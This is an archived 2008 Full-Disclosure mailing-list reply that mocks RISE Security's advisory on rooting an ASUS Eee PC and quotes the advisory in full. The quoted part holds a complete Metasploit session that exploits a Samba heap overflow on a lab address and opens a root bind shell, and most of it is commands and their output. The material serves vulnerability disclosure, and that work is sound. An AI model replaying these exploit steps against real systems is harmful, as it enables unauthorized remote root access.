| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 8 Feb 2008 13:38:24 -0600
From: reepex <reepex@...il.com>
To: "RISE Security" <advisories@...esecurity.org>,
full-disclosure@...ts.grok.org.uk
Subject: Re: ASUS Eee PC rooted out of the box
So you ran metasploit and then made a blog post. Is this what 'security
research' is considered now? And why did you write this is such a media
hyped way? Trying to get some spotlight?
On Feb 8, 2008 10:47 AM, RISE Security <advisories@...esecurity.org> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> We recently acquired an ASUS Eee PC (if you want to know more about it,
> a lot of reviews are available on internet). The first thing we did when
> we put our hands at the ASUS Eee PC was to test its security. The ASUS
> Eee PC comes with a customized version of Xandros operating system
> installed, and some other bundled software like Mozilla Firefox, Pidgin,
> Skype and OpenOffice.org.
>
> Analysing the running processes of the ASUS Eee PC, the first thing that
> caught our attention was the running smbd process (the sshd daemon was
> started by us, and is not enabled by default).
>
>
> eeepc-rise:/root> ps -e
> PID TTY TIME CMD
> 1 ? 00:00:00 fastinit
> 2 ? 00:00:00 ksoftirqd/0
> 3 ? 00:00:00 events/0
> 4 ? 00:00:00 khelper
> 5 ? 00:00:00 kthread
> 25 ? 00:00:00 kblockd/0
> 26 ? 00:00:00 kacpid
> 128 ? 00:00:00 ata/0
> 129 ? 00:00:00 ata_aux
> 130 ? 00:00:00 kseriod
> 148 ? 00:00:00 pdflush
> 149 ? 00:00:00 pdflush
> 150 ? 00:00:00 kswapd0
> 151 ? 00:00:00 aio/0
> 152 ? 00:00:00 unionfs_siod/0
> 778 ? 00:00:00 scsi_eh_0
> 779 ? 00:00:00 scsi_eh_1
> 799 ? 00:00:00 kpsmoused
> 819 ? 00:00:00 kjournald
> 855 ? 00:00:00 fastinit
> 857 ? 00:00:00 sh
> 858 ? 00:00:00 su
> 859 tty3 00:00:00 getty
> 862 ? 00:00:00 startx
> 880 ? 00:00:00 xinit
> 881 tty2 00:00:06 Xorg
> 890 ? 00:00:00 udevd
> 952 ? 00:00:00 ksuspend_usbd
> 953 ? 00:00:00 khubd
> 1002 ? 00:00:00 acpid
> 1027 ? 00:00:00 pciehpd_event
> 1055 ? 00:00:00 ifplugd
> 1101 ? 00:00:00 scsi_eh_2
> 1102 ? 00:00:00 usb-storage
> 1151 ? 00:00:00 icewm
> 1185 ? 00:00:01 AsusLauncher
> 1186 ? 00:00:00 icewmtray
> 1188 ? 00:00:01 powermonitor
> 1190 ? 00:00:00 minimixer
> 1191 ? 00:00:00 networkmonitor
> 1192 ? 00:00:00 wapmonitor
> 1193 ? 00:00:00 x-session-manag
> 1195 ? 00:00:00 x-session-manag
> 1200 ? 00:00:00 x-session-manag
> 1201 ? 00:00:00 dispwatch
> 1217 ? 00:00:00 cupsd
> 1224 ? 00:00:00 usbstorageapple
> 1234 ? 00:00:00 kondemand/0
> 1240 ? 00:00:00 portmap
> 1248 ? 00:00:00 keyboardstatus
> 1272 ? 00:00:00 memd
> 1279 ? 00:00:00 scim-helper-man
> 1280 ? 00:00:00 scim-panel-gtk
> 1282 ? 00:00:00 scim-launcher
> 1297 ? 00:00:00 netserv
> 1331 ? 00:00:00 asusosd
> 1476 ? 00:00:00 xandrosncs-agen
> 1775 ? 00:00:00 dhclient3
> 2002 ? 00:00:00 nmbd
> 2004 ? 00:00:00 smbd
> 2005 ? 00:00:00 smbd
> 2322 ? 00:00:00 sshd
> 2345 ? 00:00:00 sshd
> 2356 pts/0 00:00:00 bash
> 2362 pts/0 00:00:00 ps
> eeepc-rise:/root>
>
>
> Retrieving the the smbd version, we discovered that it runs a vulnerable
> version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
> we published earlier last year.
>
>
> eeepc-rise:/root> smbd --version
> Version 3.0.24
> eeepc-rise:/root>
>
>
> With this information, we ran our exploit against the ASUS Eee PC using
> the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> Debian based).
>
>
> msf > use linux/samba/lsa_transnames_heap
> msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> RHOST => 192.168.50.10
> msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> PAYLOAD => linux/x86/shell_bind_tcp
> msf exploit(lsa_transnames_heap) > show targets
>
> Exploit targets:
>
> Id Name
> -- ----
> 0 Linux vsyscall
> 1 Linux Heap Brute Force (Debian/Ubuntu)
> 2 Linux Heap Brute Force (Gentoo)
> 3 Linux Heap Brute Force (Mandriva)
> 4 Linux Heap Brute Force (RHEL/CentOS)
> 5 Linux Heap Brute Force (SUSE)
> 6 Linux Heap Brute Force (Slackware)
> 7 DEBUG
>
>
> msf exploit(lsa_transnames_heap) > set TARGET 1
> TARGET => 1
> msf exploit(lsa_transnames_heap) > exploit
> [*] Started bind handler
> [*] Creating nop sled....
> ...
> [*] Trying to exploit Samba with address 0x08415000...
> [*] Connecting to the SMB service...
> [*] Binding to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> ...
> [*] Bound to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
> Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> GNU/Linux
> id
> uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
>
>
> Easy to learn, Easy to work, Easy to root.
>
>
> The original blog post and more information can be found in our
> website at http://risesecurity.org/.
>
> Best regards,
> RISE Security
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.6 (GNU/Linux)
>
> iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
> 6tg6XRBCWHfPWFrSdVKu5oA=
> =OFwe
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists